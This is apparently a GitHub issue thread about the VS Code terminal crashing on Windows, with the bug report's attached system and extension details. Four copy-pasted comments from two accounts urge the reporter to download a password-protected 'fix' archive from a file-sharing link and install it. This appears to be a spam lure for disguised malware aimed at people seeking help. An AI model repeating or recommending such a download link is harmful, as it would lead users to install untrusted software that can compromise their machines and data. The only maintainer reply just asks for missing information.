### ISSUE TITLE
terminal is not working

### ISSUE THREAD

**Issue by Ramcharyv** [microsoft/vscode#227271]
Type: <b>Performance Issue</b>

Hi
im unable to run code in  terminal
when i trying to run code terminal is shutting down on itself.
im facing this issue since a month. 

VS Code version: Code 1.92.2 (fee1edb8d6d72a0ddff41e5f71a671c23ed924b9, 2024-08-14T17:29:30.058Z)
OS version: Windows_NT x64 10.0.22631
Modes:

<details>
<summary>System Info</summary>

|Item|Value|
|---|---|
|CPUs|11th Gen Intel(R) Core(TM) i5-1135G7 @ 2.40GHz (8 x 2419)|
|GPU Status|2d_canvas: enabled<br>canvas_oop_rasterization: enabled_on<br>direct_rendering_display_compositor: disabled_off_ok<br>gpu_compositing: enabled<br>multiple_raster_threads: enabled_on<br>opengl: enabled_on<br>rasterization: enabled<br>raw_draw: disabled_off_ok<br>skia_graphite: disabled_off<br>video_decode: enabled<br>video_encode: enabled<br>vulkan: disabled_off<br>webgl: enabled<br>webgl2: enabled<br>webgpu: enabled<br>webnn: disabled_off|
|Load (avg)|undefined|
|Memory (System)|15.77GB (3.54GB free)|
|Process Argv|--crash-reporter-id 7a2d17da-473d-42f1-acfd-0ab31298bf7a|
|Screen Reader|no|
|VM|0%|
</details><details>
<summary>Process Info</summary>

```
CPU %	Mem MB	   PID	Process
    0	   117	 11168	code main
    0	    90	   444	ptyHost
    2	   103	  3476	window [2] (Issue Reporter)
    0	    88	  3708	fileWatcher [1]
    0	    27	 12236	   crashpad-handler
    0	   181	 21828	   gpu-process
    0	   199	 22588	window [1] (● Untitled-2.py - Untitled (Workspace) - Visual Studio Code)
    0	   112	 23644	shared-process
    0	    42	 24756	   utility-network-service
    0	   182	 25928	extensionHost [1]
    0	     7	  4956	     "c:\Users\Ram chary\.vscode\extensions\ms-python.python-2024.12.3-win32-x64\python-env-tools\bin\pet.exe" server
    0	    11	  9012	       C:\WINDOWS\system32\conhost.exe 0x4
    0	    85	 13028	     "C:\Users\Ram chary\AppData\Local\Programs\Microsoft VS Code\Code.exe" "c:\Users\Ram chary\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\json-language-features\server\dist\node\jsonServerMain" --node-ipc --clientProcessId=25928
    0	   163	 23064	     electron-nodejs (bundle.js )
```

</details>
<details>
<summary>Workspace Info</summary>

```
|  Window (● Untitled-2.py - Untitled (Workspace) - Visual Studio Code)
|    Folder (sql vscode): 0 files
|      File types:
|      Conf files:;
```

</details>
<details><summary>Extensions (15)</summary>

Extension|Author (truncated)|Version
---|---|---
code-runner|for|0.12.2
gc-excelviewer|Gra|4.2.62
rainbow-csv|mec|3.12.0
debugpy|ms-|2024.11.2024082901
python|ms-|2024.12.3
vscode-pylance|ms-|2024.8.2
jupyter|ms-|2024.7.0
jupyter-keymap|ms-|1.1.2
jupyter-renderers|ms-|1.0.19
vscode-jupyter-cell-tags|ms-|0.1.9
vscode-jupyter-slideshow|ms-|0.1.6
live-server|ms-|0.4.14
remote-explorer|ms-|0.4.3
remote-server|ms-|1.5.2
json|Zai|2.0.2

</details><details>
<summary>A/B Experiments</summary>

```
vsliv368:30146709
vspor879:30202332
vspor708:30202333
vspor363:30204092
vscod805cf:30301675
binariesv615:30325510
vsaa593cf:30376535
py29gd2263:31024239
c4g48928:30535728
azure-dev_surveyone:30548225
962ge761:30959799
pythongtdpath:30769146
welcomedialogc:30910334
pythonnoceb:30805159
asynctok:30898717
pythonregdiag2:30936856
pythonmypyd1:30879173
2e7ec940:31000449
pythontbext0:30879054
accentitlementsc:30995553
dsvsc016:30899300
dsvsc017:30899301
dsvsc018:30899302
cppperfnew:31000557
dsvsc020:30976470
pythonait:31006305
dsvsc021:30996838
da93g388:31013173
pythoncenvpt:31062603
a69g1124:31058053
dvdeprecation:31068756
dwnewjupyter:31046869
newcmakeconfigv2:31071590
impr_priority:31102340
refactort:31108082
pythonrstrctxt:31112756
flightc:31119335
wkspc-onlycs-t:31111718
wkspc-ranged-t:31125599
fje88620:31121564
aajjf12562cf:31125794

```

</details>

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by meganrogge** [comment]
It looks like your report is missing some important information, See [this wiki page](https://github.com/microsoft/vscode/wiki/Terminal-Issues) for more info on how to report actionable terminal issues.
